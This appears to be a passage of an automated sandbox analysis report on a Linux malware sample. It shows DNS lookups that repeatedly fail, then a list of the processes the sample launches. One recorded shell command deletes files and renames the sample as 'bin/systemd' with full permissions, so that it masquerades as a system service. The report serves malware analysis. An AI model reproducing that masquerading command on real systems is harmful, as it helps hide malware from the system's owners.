                  Mar 20, 2023 17:12:39.682928085 CET8.8.8.8192.168.2.230xc1fName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:12:39.703553915 CET8.8.8.8192.168.2.230xc1fName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:12:49.721863985 CET8.8.8.8192.168.2.230x554dName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:12:49.741826057 CET8.8.8.8192.168.2.230x554dName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:12:49.762021065 CET8.8.8.8192.168.2.230x554dName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:12:49.780055046 CET8.8.8.8192.168.2.230x554dName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:12:49.800240993 CET8.8.8.8192.168.2.230x554dName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:12:58.819556952 CET8.8.8.8192.168.2.230xf9e6Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:12:58.839855909 CET8.8.8.8192.168.2.230xf9e6Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:12:58.859692097 CET8.8.8.8192.168.2.230xf9e6Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:12:58.885704994 CET8.8.8.8192.168.2.230xf9e6Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:12:58.904095888 CET8.8.8.8192.168.2.230xf9e6Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:00.924227953 CET8.8.8.8192.168.2.230xdd9aName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:00.944436073 CET8.8.8.8192.168.2.230xdd9aName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:00.964705944 CET8.8.8.8192.168.2.230xdd9aName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:00.984287977 CET8.8.8.8192.168.2.230xdd9aName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:01.004405022 CET8.8.8.8192.168.2.230xdd9aName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:11.026776075 CET8.8.8.8192.168.2.230x52bName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:11.044946909 CET8.8.8.8192.168.2.230x52bName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:11.062887907 CET8.8.8.8192.168.2.230x52bName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:11.081073046 CET8.8.8.8192.168.2.230x52bName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:11.099245071 CET8.8.8.8192.168.2.230x52bName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:16.119565964 CET8.8.8.8192.168.2.230xb14aName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:16.138021946 CET8.8.8.8192.168.2.230xb14aName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:16.155735970 CET8.8.8.8192.168.2.230xb14aName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:16.173990011 CET8.8.8.8192.168.2.230xb14aName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:16.192210913 CET8.8.8.8192.168.2.230xb14aName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:22.210215092 CET8.8.8.8192.168.2.230x6156Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:22.230431080 CET8.8.8.8192.168.2.230x6156Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:22.248961926 CET8.8.8.8192.168.2.230x6156Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:22.269521952 CET8.8.8.8192.168.2.230x6156Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:22.287919044 CET8.8.8.8192.168.2.230x6156Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:24.306523085 CET8.8.8.8192.168.2.230x3ad3Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:24.326883078 CET8.8.8.8192.168.2.230x3ad3Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:24.346240044 CET8.8.8.8192.168.2.230x3ad3Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:24.364700079 CET8.8.8.8192.168.2.230x3ad3Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:24.384423971 CET8.8.8.8192.168.2.230x3ad3Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:26.403085947 CET8.8.8.8192.168.2.230xf22cName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:26.422889948 CET8.8.8.8192.168.2.230xf22cName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:26.440850973 CET8.8.8.8192.168.2.230xf22cName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:26.460712910 CET8.8.8.8192.168.2.230xf22cName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:26.480361938 CET8.8.8.8192.168.2.230xf22cName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:32.500587940 CET8.8.8.8192.168.2.230x9199Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:32.520541906 CET8.8.8.8192.168.2.230x9199Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:32.538984060 CET8.8.8.8192.168.2.230x9199Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:32.558924913 CET8.8.8.8192.168.2.230x9199Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:32.577260017 CET8.8.8.8192.168.2.230x9199Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:37.598125935 CET8.8.8.8192.168.2.230x5ffName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:37.618659973 CET8.8.8.8192.168.2.230x5ffName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:37.642180920 CET8.8.8.8192.168.2.230x5ffName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:37.662312031 CET8.8.8.8192.168.2.230x5ffName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:37.680573940 CET8.8.8.8192.168.2.230x5ffName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:42.700556040 CET8.8.8.8192.168.2.230x4f3dName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:42.718492985 CET8.8.8.8192.168.2.230x4f3dName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:42.738679886 CET8.8.8.8192.168.2.230x4f3dName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:42.756644964 CET8.8.8.8192.168.2.230x4f3dName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:42.776458025 CET8.8.8.8192.168.2.230x4f3dName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:52.796152115 CET8.8.8.8192.168.2.230x3963Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:52.814260960 CET8.8.8.8192.168.2.230x3963Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:52.832432985 CET8.8.8.8192.168.2.230x3963Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:52.850893974 CET8.8.8.8192.168.2.230x3963Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:13:52.871275902 CET8.8.8.8192.168.2.230x3963Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:01.891750097 CET8.8.8.8192.168.2.230x8cc2Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:01.910582066 CET8.8.8.8192.168.2.230x8cc2Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:01.931508064 CET8.8.8.8192.168.2.230x8cc2Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:01.952198982 CET8.8.8.8192.168.2.230x8cc2Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:01.972140074 CET8.8.8.8192.168.2.230x8cc2Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:08.990540981 CET8.8.8.8192.168.2.230x643fName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:09.008733988 CET8.8.8.8192.168.2.230x643fName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:09.030216932 CET8.8.8.8192.168.2.230x643fName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:09.050682068 CET8.8.8.8192.168.2.230x643fName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:09.069377899 CET8.8.8.8192.168.2.230x643fName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:18.089854956 CET8.8.8.8192.168.2.230xa1d0Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:18.107858896 CET8.8.8.8192.168.2.230xa1d0Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:18.127896070 CET8.8.8.8192.168.2.230xa1d0Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:18.145593882 CET8.8.8.8192.168.2.230xa1d0Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:18.165282011 CET8.8.8.8192.168.2.230xa1d0Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:27.183267117 CET8.8.8.8192.168.2.230x186fName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:27.203397989 CET8.8.8.8192.168.2.230x186fName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:27.221693039 CET8.8.8.8192.168.2.230x186fName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:27.239876032 CET8.8.8.8192.168.2.230x186fName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:27.259748936 CET8.8.8.8192.168.2.230x186fName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:29.278733015 CET8.8.8.8192.168.2.230x8d17Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:29.298923969 CET8.8.8.8192.168.2.230x8d17Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:29.319319010 CET8.8.8.8192.168.2.230x8d17Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:29.339601040 CET8.8.8.8192.168.2.230x8d17Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:29.357830048 CET8.8.8.8192.168.2.230x8d17Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:30.376674891 CET8.8.8.8192.168.2.230x7a2eName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:30.394891024 CET8.8.8.8192.168.2.230x7a2eName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:30.413374901 CET8.8.8.8192.168.2.230x7a2eName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:30.432030916 CET8.8.8.8192.168.2.230x7a2eName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:14:30.450268984 CET8.8.8.8192.168.2.230x7a2eName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false

                  System Behavior

                  Start time:17:12:31
                  Start date:20/03/2023
                  Path:/tmp/VeTv7e9Dcz.elf
                  Arguments:/tmp/VeTv7e9Dcz.elf
                  File size:5388968 bytes
                  MD5 hash:ae65271c943d3451b7f026d1fadccea6
                  Start time:17:12:31
                  Start date:20/03/2023
                  Path:/tmp/VeTv7e9Dcz.elf
                  Arguments:n/a
                  File size:5388968 bytes
                  MD5 hash:ae65271c943d3451b7f026d1fadccea6
                  Start time:17:12:31
                  Start date:20/03/2023
                  Path:/bin/sh
                  Arguments:sh -c "rm -rf bin/systemd && mkdir bin; >bin/systemd && mv /tmp/VeTv7e9Dcz.elf bin/systemd; chmod 777 bin/systemd"
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                  Start time:17:12:31
                  Start date:20/03/2023
                  Path:/bin/sh
                  Arguments:n/a
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                  Start time:17:12:31
                  Start date:20/03/2023
                  Path:/usr/bin/rm
                  Arguments:rm -rf bin/systemd
                  File size:72056 bytes
                  MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b
                  Start time:17:12:31
                  Start date:20/03/2023
                  Path:/bin/sh
                  Arguments:n/a
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                  Start time:17:12:31
                  Start date:20/03/2023
                  Path:/usr/bin/mkdir
                  Arguments:mkdir bin
                  File size:88408 bytes
                  MD5 hash:088c9d1df5a28ed16c726eca15964cb7
                  Start time:17:12:31
                  Start date:20/03/2023
                  Path:/bin/sh
                  Arguments:n/a
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                  Start time:17:12:31
                  Start date:20/03/2023
                  Path:/usr/bin/mv
                  Arguments:mv /tmp/VeTv7e9Dcz.elf bin/systemd
                  File size:149888 bytes
                  MD5 hash:504f0590fa482d4da070a702260e3716
                  Start time:17:12:31
                  Start date:20/03/2023
                  Path:/bin/sh
                  Arguments:n/a
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                  Start time:17:12:31
                  Start date:20/03/2023
                  Path:/usr/bin/chmod
                  Arguments:chmod 777 bin/systemd
                  File size:63864 bytes
                  MD5 hash:739483b900c045ae1374d6f53a86a279
                  Start time:17:12:31
                  Start date:20/03/2023
                  Path:/tmp/VeTv7e9Dcz.elf
                  Arguments:n/a
                  File size:5388968 bytes
                  MD5 hash:ae65271c943d3451b7f026d1fadccea6
                  Start time:17:12:31
                  Start date:20/03/2023
                  Path:/tmp/VeTv7e9Dcz.elf
                  Arguments:n/a
                  File size:5388968 bytes
                  MD5 hash:ae65271c943d3451b7f026d1fadccea6
                  Start time:17:12:31
                  Start date:20/03/2023
                  Path:/tmp/VeTv7e9Dcz.elf
                  Arguments:n/a
                  File size:5388968 bytes
                  MD5 hash:ae65271c943d3451b7f026d1fadccea6